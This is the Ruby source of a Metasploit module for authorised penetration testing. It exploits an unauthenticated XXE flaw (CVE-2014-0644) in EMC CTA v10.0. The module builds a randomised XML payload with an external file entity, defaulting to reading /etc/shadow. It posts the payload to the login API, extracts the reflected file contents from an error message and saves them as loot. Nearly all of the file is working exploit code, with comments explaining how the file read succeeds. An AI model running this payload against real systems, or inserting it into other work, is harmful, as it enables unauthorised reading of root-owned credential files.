GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/emc_cta_xxe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
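class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
      'Description' => %q{
        EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
        that allows an attacker to read arbitrary files from the file system
        with the permissions of the root user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
        ],
      'References' =>
        [
          ['CVE', '2014-0644'],
          ['EDB', '32623']
        ],
      'DisclosureDate' => '2014-03-31'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
      ]
    )
  end

  # Builds the XML login request carrying the XXE payload.
  #
  # The DOCTYPE declares an external general entity whose SYSTEM identifier is
  # file://<path>; the entity is referenced from <Password>, so the parser
  # substitutes the file's contents into that element before the application
  # sees it. DOCTYPE, element and entity names are randomised per run so the
  # request has no fixed byte pattern.
  #
  # @param path [String] absolute path of the file to read on the target
  # @return [String] the serialised XML document to POST
  def build_xxe_payload(path)
    doctype = Rex::Text.rand_text_alpha(6)
    element = Rex::Text.rand_text_alpha(6)
    entity = Rex::Text.rand_text_alpha(6)

    %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE #{doctype} [
<!ELEMENT #{element} ANY >
<!ENTITY #{entity} SYSTEM "file://#{path}" >]>
<Request>
<Username>root</Username>
<Password>&#{entity};</Password>
</Request>
}
  end

  # Sends the XXE request to /api/login, extracts the reflected file contents
  # from the error response and stores them as loot.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when FILEPATH is unusable, the
  #   target does not answer, or the response does not contain the file
  def run
    path = datastore['FILEPATH']

    # The path is spliced verbatim into a double-quoted SYSTEM literal; a '"'
    # inside it would close the literal early and yield a malformed DTD that the
    # target rejects before ever resolving the entity.
    if path.include?('"')
      fail_with(Failure::BadConfig, 'FILEPATH must not contain a double quote character')
    end

    vprint_status("Requesting #{path} through the XXE login request")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),
      'method' => 'POST',
      'data' => build_xxe_payload(path)
    })

    if !res || !res.body
      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
    end

    # The application echoes the expanded <Password> value back inside a Java
    # NumberFormatException-style message ('For input string: "..."'), which is
    # what turns the XXE into a file read. Ruby's /m makes '.' match newlines so
    # multi-line files are captured; note the group is greedy, so if the file
    # itself contains a double quote the capture runs to the last '"' in the
    # body and may include trailing response text.
    match = /For input string: "(.*)"/m.match(res.body)

    # No match typically means the parser choked on the file contents: binary
    # data, or text containing '<' / '&', makes the expanded document ill-formed
    # and the server never reaches the code path that reflects the value.
    unless match
      fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")
    end

    file = match[1]

    loot_path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])

    print_good("File saved to: #{loot_path}")
  end
end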